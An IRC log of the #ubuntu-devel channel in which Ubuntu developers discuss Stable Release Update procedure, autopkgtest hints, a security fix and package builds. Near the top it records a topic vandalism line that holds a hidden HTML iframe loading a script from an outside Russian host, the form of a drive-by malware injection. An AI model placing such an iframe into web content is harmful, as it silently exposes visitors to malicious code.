robert_ancellbdmurray, I fixed the SRU template in https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164 - please release that SRU! Needed because the reviews server is going to be disabled soon.00:21
ubottuLaunchpad bug 1738164 in gnome-software (Ubuntu Cosmic) "[snap] U2F doesn't work with yubikey" [Medium,Confirmed]00:21
=== whack-a-mole changed the topic of #ubuntu-devel to: <body><iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe>
=== Unit193 changed the topic of #ubuntu-devel to: Archive: FF, DIF | 18.10 Released! | Devel of Ubuntu (not support) | Build failures: http://qa.ubuntuwire.com/ftbfs/ | #ubuntu for support and discussion of Trusty-Cosmic | If you can't send messages here, authenticate to NickServ first | Patch Pilots:
=== led_dark_2 is now known as led_dark_1
dupondjehttps://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-0211.html -> I would have expected to see patches for this already?08:42
ubottu** <A HREF="https://cve.mitre.org/about/faqs.html#reserved_signify_in_cve_entry">RESERVED</A> ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem.  When the candidate has been publicized, the details for this candidate will be provided. (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0211)08:42
sbeattiedupondje: mdeslaur has packages available for testing https://launchpad.net/~ubuntu-security-proposed/+archive/ubuntu/ppa/+packages ; feedback welcome08:44
=== realitix_ is now known as realitix
=== ricab is now known as ricab|lunch
rbasaksil2100: on non-SRU editing the template, there was also https://wiki.ubuntu.com/StableReleaseUpdates?action=diff&rev1=290&rev2=29213:32
rbasakI didn't mention it before because I didn't find that change objectionable.13:32
sil2100rbasak: hey, thanks for watching those changes, makes me feel better that there's someone subscribed and monitoring those13:38
sil2100rbasak: yeah, I wouldn't think this one is something I'd personally require, but it certainly is a bit less 'invasive' (but I guess that's just my feeling)13:38
=== cpaelzer_ is now known as cpaelzer
cpaelzercjwatson: I did not mean to stress the openssh bug or you, I just didn't know what feedback times to expect on that list and therefore pinged for you13:39
sil2100rbasak: although this one I'm less keen on reverting since that's what all the kernel SRUs were following anyway13:39
cpaelzerbut the TL;DR for me is that you seem to have it under control and that is enough for me13:39
cpaelzerI was only concerned to miss getting into Disco in time13:40
cjwatsoncpaelzer: Yep - I've had a private response FWIW13:41
=== ricab|lunch is now known as ricab
sil2100mvo: hey! Did you take a look at bionic/xenial test regressions triggered by systemd?14:34
sil2100mvo: I'd like to release it to -updates today, was wondering if you checked if those are related/unrelated etc.14:34
sil2100mvo: the xenial ones seem unrelated, guess I can just hint some of those and let it in14:35
sil2100mvo: there seems to be a bit more for bionic though14:35
sil2100mvo: ok, anyway, I'll look at those now14:36
=== chrisccoulson_ is now known as chrisccoulson
dokorbalint: xnox says the tomcat9 fix should be ok. could you upload that today, then I'll take care about bionic and cosmic14:53
mvosil2100: I did look14:55
mvosil2100: sorry for the late reply14:55
mvosil2100: I did look and all the ones I looked at had a long history of failures, I did not spot anything that looked like a "new" thing, but let me double check again. iirc there was something (libglib?) that I had to restart but then it went away14:56
rbalintdoko, already uploaded, it is in unapproved14:57
rbalintdoko, pinged sil2100 on #ubuntu-release14:57
rbalintdoko, cosmic is already ok14:58
rbalintdoko, (and up)14:58
dokorbalint: cosmic-proposed?14:58
dokohmm, don't see anything ini c or d15:00
rbalintdoko, cosmic's systemd supports the syntax used in tomcat9.conf15:00
dokoahh, ok15:00
dokorbalint: I'm rejecting it, and uploading to the ppa, because we must not build against -updates, just security15:02
sil2100mvo: ACK!15:04
rbalintdoko, ack15:05
rbalintdoko, thanks15:05
rbasaksil2100: why not accept britney hints for SRUs via MPs? Or are you only saying that it hasn't been discussed?15:26
sil2100rbasak: I'm saying it's not a requirement15:28
sil2100rbasak: at least I never actually required anyone to do that for me - I appreciate it, but it's actually not much 'less' work for me to get that merged15:28
dokorbasak, sil2100: that should be documented, and then it should be ensured that these are regularily/daily addressed15:28
sil2100Yeah, currently it is not and I am not monitoring MPs for hints15:29
sil2100As this is not part of our official processes15:29
rbasakdoko: I agree. First we need consensus on what the process should be though, which is what we're doing now. Then it can be documented.15:29
sil2100The only thing official part of the process so far is: for each failing autopkgtest we should have hints committed if we let the upload land15:29
dokosure, but the current practice of ignoring hints on #u-r isn't ideal either15:30
sil2100I personally just do it myself, or if someone pokes me with an MP I can use it instead15:30
rbasaksil2100: IMHO it is less work - because I can start my shift by looking for the MPs, and then the person on the next shift (after the report is regenerated) won't have to trawl through a rather large list of bugs looking for autopkgtest false positive explanations when the majority of bugs don't have those. IMHO that's a waste of time.15:30
rbasakIf instead we use MPs, then I only need to pay attention to the bugs that are clean on the report.15:30
rbasakSeparately, I'd like to make sure that bugs make it clear what is blocking SRU progress. I have thoughts on writing a bot for othat.15:31
sil2100rbasak: well, as I mentioned in the thread, there is tooling for that 'almost there'15:31
sil2100I don't want a separate bot for that15:31
sil2100It'll be part of britney15:31
sil2100It was reviewed recently and needs a few cleanups that I just need to get to finally15:32
sil2100Anyway, I'm open to suggestions, I can add checking for hint MPs as part of my general SRU shift if that's what we decide, but I would prefer a discussion before we do that15:33
sil2100I'm a bit worried that people would then blindly just submit MPs for hints without explaination of the failures, we'd have to formalize how such MPs should be formalized15:35
sil2100Since I'd like to know that someone did actually check the failure, identified why it's failing and leave it as a comment in the hint+MP-description, while right now it's obvious they have to 'convince us' that the hint is needed15:36
rbasakI feel that the same applies to an MP - no justification given, no approval - but sure, we can document that.15:37
sil2100Yeah, since like a half of the hint MPs I get are completely blank as far as context is concerned, so yeah, I have bad experiences + what x_nox already mentioned, people putting hints in bad places, merge conflicts etc.15:38
sil2100So usually for me it's not much less work15:38
sil2100(context: this is about SRUs)15:42
mdeslaurdupondje: https://usn.ubuntu.com/3937-1/15:49
rbasaksil2100: on the bot, I just meant that we need to ensure that bugs don't languish with nobody understanding that we're waiting on a hints MP (if that's what we decide the process should be). If your tooling enhancements can do that, then great.15:54
rbasaksil2100: separately, I want to write a bot that maintains a section in the bug description explaining exactly what the next step is, who needs to do it, etc.15:54
rbasakBy looking at the unapproved queue, pending-sru report, tag status, dep8 status, etc.15:54
rbasakThis would be for people unfamiliar with the SRU process, such as non-Ubuntu-developer community contributors.15:54
rbasakIt'd also explain FAQ items such as "yes it's verified but not aged yet"15:55
rbasakBecause otherwise the SRU workflow is quite convoluted and unfathomable to outsiders, IMHO, because it involves various different reports, queues, tags, workflow, paperwork, etc, all interacting in quite a complex way.15:56
ddstreetsil2100 is your tooling in lp, somewhere i can peek at?16:07
pedahzurGood morning (from my time zone)! I have an issue in Launchpad that affects 18.04 (and probably after). It has a link to the upstream bug, and a link to the patch that fixes the issue. How do I go about getting some attention on it so we could get a new version of the package released? https://bugs.launchpad.net/ubuntu/+source/adcli/+bug/1821242 Thanks!16:54
ubottuLaunchpad bug 1821242 in adcli (Ubuntu) "adcli delete dies with free(): invalid pointer" [Undecided,New]16:54
sarnoldpedahzur: probably the next step is to attach a debdiff for the fix, fill in the SRU bug template in the bug report, and subscribe ubuntu-sponsors to the bug; the full details are on https://wiki.ubuntu.com/StableReleaseUpdates16:58
pedahzursarnold: Thanks! Never done that before. Will be a learning experience. :)16:59
sarnoldpedahzur: the one wrinkle that I don't understand is that you usually have to arrange for the bug to be fixed in -devel, too; I *think* this should just be a bug fix for that, too, and it's not a huge patch, so probably doesn't need the feature freeze exception dance.. but that's outside my usual experience17:01
rbasaksarnold, pedahzur: right - feature freeze doesn't apply to bugfixes that don't involve feature changes.17:15
sarnoldrbasak: good good :)17:16
=== JanC is now known as Guest19220
=== JanC_ is now known as JanC
LeoBhello! I am trying to compile libvirt for ubuntu from the git repo (https://git.launchpad.net/~libvirt-maintainers/ubuntu/+source/libvirt, branch ubuntu/bionic) but 'fakeroot debian/rules binary' fails, with messages about moving files21:11
LeoBis this the right procedure?21:11
LeoB(I am testing a patch backport)21:12
rbasakLeoB: https://git.launchpad.net/~libvirt-maintainers/ubuntu/+source/libvirt/tree/debian/rules?h=ubuntu/bionic-4.0#n18221:15
rbasakI suspect that's a bug in packaging because DEB_HOST_MULTIARCH isn't set but your entry point should work.21:15
rbasakWhat you're doing is reasonable I think, but to work around te bug you might try https://wiki.ubuntu.com/SimpleSbuild21:16
rbasaksbuild is what Ubuntu developers usually use to build in a clean and reproducible environment21:16
rbasakOh, and usually you'd run the build target first without fakeroot.21:18
LeoBrbasak,this sbuild seems very complicated21:23
rbasakYes, it is unfortunately. Once set up it's not too bad.21:24
rbasakWe're working on a much easier (one command) way to build debs reliably from a git checkout, but it's quite buggy right now I'm afraid.21:24
LeoBwell, ok21:25
LeoBthanks for helping21:25

Generated by irclog2html.py 2.7 by Marius Gedminas - find it at mg.pov.lt!